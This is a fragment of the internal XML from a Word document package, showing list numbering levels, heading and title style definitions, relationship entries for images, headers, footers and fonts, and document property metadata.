    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="18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spacing w:after="0" w:before="480" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="702" w:hanging="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="200" w:line="271" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
      <w:i w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
      <w:color w:val="7f7f7f"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="271" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="1"/>
      <w:i w:val="1"/>
      <w:color w:val="7f7f7f"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:color="000000" w:space="1" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="600" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
      <w:i w:val="1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1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml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image" Target="media/image13.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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atoBlack-bold.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoBlack-boldItalic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0x0101008EBFFEDEA987FF4E8FE7AB5C0322DD9F</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>2769352c-ca34-4ed9-9a12-abc4b8027d2c</vt:lpwstr>
  </property>
</Properties>
</file>